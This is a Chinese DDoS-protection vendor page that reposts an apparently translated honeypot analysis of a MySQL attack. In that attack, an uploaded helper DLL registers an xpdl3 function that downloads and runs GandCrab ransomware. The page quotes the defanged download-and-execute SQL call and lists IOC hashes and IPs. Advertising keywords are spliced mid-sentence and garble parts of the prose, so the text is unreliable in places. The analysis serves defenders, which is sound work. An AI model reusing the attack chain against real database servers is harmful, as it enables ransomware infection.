DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > DDOS防御 > 正文

高防ip_高防云服务器租用_无缝切换

11-08 DDOS防御

高防ip_高防云服务器租用_无缝切换

我们在实验室环境中运行的一个蜜罐,监听用于SQL服务器(3306/tcp)的默认端口,本周在美国的一台机器上收到了一个有趣的攻击。我们监视这个蜜罐产生的行为和网络流量,并惊讶地看到蜜罐(在Linux下运行)下载了一个Windows可执行文件。攻击者首先使用SQL数据库命令将一个小的helper DLL上载到服务器,然后将该DLL作为数据库函数调用,以检索位于加拿大魁北克省一个IP地址上的GandCrab负载。下载GandCrab的"数据库服务器"蜜罐没有受到伤害,但我们认为记录攻击的性质是值得的。解释了SQL攻击攻击的第一阶段涉及到攻击者连接到数据库服务器并确定它正在运行MySQL。蜜罐模仿MySQL,所以其余的攻击进行得比较顺利。攻击者发出的SQL命令接下来,攻击者使用"set"命令将组成helper DLL的所有字节(以十六进制字符的长字符串的形式)上载到变量的内存中。helper DLL像一个很长的条目一样输入到数据库中然后,攻击者将该变量的内容写到它创建的名为yongger2的数据库表中。然后,攻击者向服务器发出命令,将这些字节连接到一个文件中,并将它们放入服务器的插件目录中。我们还观察到了一些用于交换正斜杠和反斜杠字符的命令,这些命令似乎是为了结束对安全功能的循环。Helper DLL的内部函数DLL似乎向数据库添加了三个函数,cc攻击防御软件,分别名为xpdl3、xpdl3_deinit和xpdl3_init,并且被观察到是许多恶意工具包中的组件文件,防火墙防御cc,这些恶意工具包先前已上载到VirusTotal等服务。helper DLL包含在许多包含已上载到VirusTotal的恶意工具包的存档中攻击者发出SQL命令删除yongger2表,删除文件通过服务器的轨迹记录,并删除名为xpdl3的函数(如果已经存在)。最后,它使用以下SQL命令创建一个新的数据库函数(也称为xpdl3),该函数调用DLL:创建函数xpdl3返回字符串SONAME"cna12.dll"将helper DLL传递到数据库服务器的插件目录并对其进行初始化后,攻击者向服务器发出以下SQL命令,调用新添加的xpdl3函数:选择xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe文件')(注意:此链接已被修改,以便更难意外单击链接,该链接在发布时仍处于活动状态。)Wireshark中显示的网络事件序列如果一切正常(在本例中是这样的),防御ddos自动防御的吗,数据库服务器从远程机器下载GandCrab有效负载并将其放入名为C:驱动器的根目录中isetup.exe文件并执行它。这些袭击有多普遍?针对数据库服务器的攻击并不是什么新鲜事;我们在过去已经写过,将来可能还会继续写。这起特别的袭击发生在5月19日星期日,当地时间中午,仅仅几秒钟。如果这次攻击是针对一个实际的MySQL服务器进行的,那么现在该机器将被加密,并且该服务器的所有者将遇到一些麻烦。opendirectory使用HFS托管,具有中文用户界面但是文件来源的URL需要仔细检查。它指的是运行服务器软件HFS的web服务器上的一个开放目录,HFS是一个以单一应用程序形式存在的基于Windows的web服务器。有趣的是,托管GandCrab样本Geo的这台机器的IP地址位于美国西南沙漠地区的亚利桑那州,而这台机器上HFS安装的用户界面是简体中文。另一个有趣的地方是它显示了有人下载了这个服务器上托管的任何文件的次数。opendirectory显示了五个Windows可执行文件,它们的名称以"3306"开头,所有文件名中带有连字符的文件实际上都是同一文件的重命名版本。只有名为"3306.exe"的文件与其他文件不同。(使用3306作为文件名可能并非巧合。)该目录还包含一个名为RDP的恶意Linux ELF可执行文件,此攻击未使用该文件。"RDP"文件是支持DDoS的Linux特洛伊木马的众多示例之一(screen:Virustotal)服务器显示我看到的MySQL蜜罐下载示例(3306-1.exe)的下载次数超过500次。但是,名为3306-2.exe、3306-3.exe和3306-4.exe的示例与该文件相同。加在一起,防御ddos流量攻击,在这台服务器上的5天里,已经有将近800次下载,另外一个(大约一周前)的GandCrab样本在开放目录中的下载量也超过了2300次。因此,虽然这并不是一个特别大规模或广泛的攻击,广东高防cdn,但它确实给MySQL服务器管理员带来了严重的风险,因为他们在数据库服务器上的3306端口通过防火墙被外部世界访问。Sophos products将检测Gandcrab样品为Troj/Kryptik JG。DLL帮助程序文件检测为Mal/DownLdr-AC。IOC公司甘蟹样品c83bf900eb759e5de5c8b0697a101ce81573874a440ac07ae4ecbc56c4f69331017B236BF38A1CF9A52FC0BDE2D5F23F038B00F9811C8A58B66B1C756B8D6"cna12.dll"帮助程序1F86561CA8FF302DF2A64E6D12F530BB461F9A93CF9B7C074699E834F59EF44主持人172.96.14.134:5471(甘蟹宿主)148.72.171.83(MySQL攻击者)

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: /ddos1/51446.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 6934211访问次数
  • 建站天数

    QQ客服

    400-0797-119

    X